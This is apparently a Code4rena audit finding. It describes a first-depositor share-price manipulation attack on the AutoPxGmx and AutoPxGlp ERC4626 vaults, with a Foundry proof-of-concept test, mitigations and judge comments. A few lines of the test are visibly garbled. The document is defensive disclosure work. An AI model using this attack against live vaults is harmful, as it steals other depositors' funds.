code-423n4 / 2022-11-redactedcartel-findings

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Underlying assets stealing in `AutoPxGmx` and `AutoPxGlp` via share price manipulation #275

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


pxGMX and pxGLP tokens can be stolen from depositors in AutoPxGmx and AutoPxGlp vaults by manipulating the price of a share.

Proof of Concept

ERC4626 vaults are subject to a share price manipulation attack that allows an attacker to steal underlying tokens from other depositors (this is a known issue of Solmate's ERC4626 implementation). Consider this scenario (this is applicable to AutoPxGmx and AutoPxGlp vaults):

  1. Alice is the first depositor of the AutoPxGmx vault;
  2. Alice deposits 1 wei of pxGMX tokens;
  3. in the deposit function (PirexERC4626.sol#L60), the amount of shares is calculated using the previewDeposit function:

    function previewDeposit(uint256 assets)
        returns (uint256)
        return convertToShares(assets);
    function convertToShares(uint256 assets)
        returns (uint256)
        uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.
        return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());
  4. since Alice is the first depositor (totalSupply is 0), she gets 1 share (1 wei);
  5. Alice then sends 9999999999999999999 pxGMX tokens (10e18 - 1) to the vault;
  6. the price of 1 share is 10 pxGMX tokens now: Alice is the only depositor in the vault, she's holding 1 wei of shares, and the balance of the pool is 10 pxGMX tokens;
  7. Bob deposits 19 pxGMX tokens and gets only 1 share due to the rounding in the convertToShares function: 19e18 * 1 / 10e18 == 1;
  8. Alice redeems her share and gets a half of the deposited assets, 14.5 pxGMX tokens (less the withdrawal fee);
  9. Bob redeems his share and gets only 14.5 pxGMX (less the withdrawal fee), instead of the 19 pxGMX he deposited.
// test/AutoPxGmx.t.sol
function testSharePriceManipulation_AUDIT() external {
    address alice = address(0x31337);
    address bob = address(0x12345);
    vm.label(alice, "Alice");
    vm.label(bob, "Bob");

    // Resetting the withdrawal fee for cleaner amounts.

    vm.startPrank(address(pirexGmx));   , 10e18);, 19e18);

    pxGmx.approve(address(autoPxGmx), 1);
    // Alice deposits 1 wei of pxGMX and gets 1 wei of shares.
    autoPxGmx.deposit(1, alice);
    // Alice sends 10e18-1 of pxGMX and sets the price of 1 wei of shares to 10e18 pxGMX.
    pxGmx.transfer(address(autoPxGmx), 10e18-1);

    pxGmx.approve(address(autoPxGmx), 19e18);
    // Bob deposits 19e18 of pxGMX and gets 1 wei of shares due to rounding and the price manipulation.
    autoPxGmx.deposit(19e18, bob);

    // Alice and Bob redeem their shares.           
    autoPxGmx.redeem(1, alice, alice);
    autoPxGmx.redeem(1, bob, bob);

    // Alice and Bob both got 14.5 pxGMX.
    // But Alice deposited 10 pxGMX and Bob deposited 19 pxGMX – thus, Alice stole pxGMX tokens from Bob.
    // With withdrawal fees enabled, Alice would've been penalized more than Bob
    // (14.065 pxGMX vs 14.935 pxGMX tokens withdrawn, respectively),
    // but Alice would've still gotten more pxGMX that she deposited.
    assertEq(pxGmx.balanceOf(alice), 14.5e18);
    assertEq(pxGmx.balanceOf(bob), 14.5e18);

Tools Used

Manual review

Recommended Mitigation Steps

Consider either of these options:

  1. In the deposit function of PirexERC4626, consider requiring a reasonably high minimal amount of assets during first deposit. The amount needs to be high enough to mint many shares to reduce the rounding error and low enough to be affordable to users.
  2. On the first deposit, consider minting a fixed and high amount of shares, irrespective of the deposited amount.
  3. Consider seeding the pools during deployment. This needs to be done in the deployment transactions to avoiding front-running attacks. The amount needs to be high enough to reduce the rounding error.
  4. Consider sending first 1000 wei of shares to the zero address. This will significantly increase the cost of the attack by forcing an attacker to pay 1000 times of the share price they want to set. For a well-intended user, 1000 wei of shares is a negligible amount that won't diminish their share significantly.
c4-judge commented 1 year ago

Picodes marked the issue as duplicate of #407

c4-judge commented 1 year ago

Picodes marked the issue as selected for report

c4-judge commented 1 year ago

Picodes changed the severity to 3 (High Risk)

C4-Staff commented 1 year ago

JeeberC4 marked the issue as not a duplicate

C4-Staff commented 1 year ago

JeeberC4 marked the issue as primary issue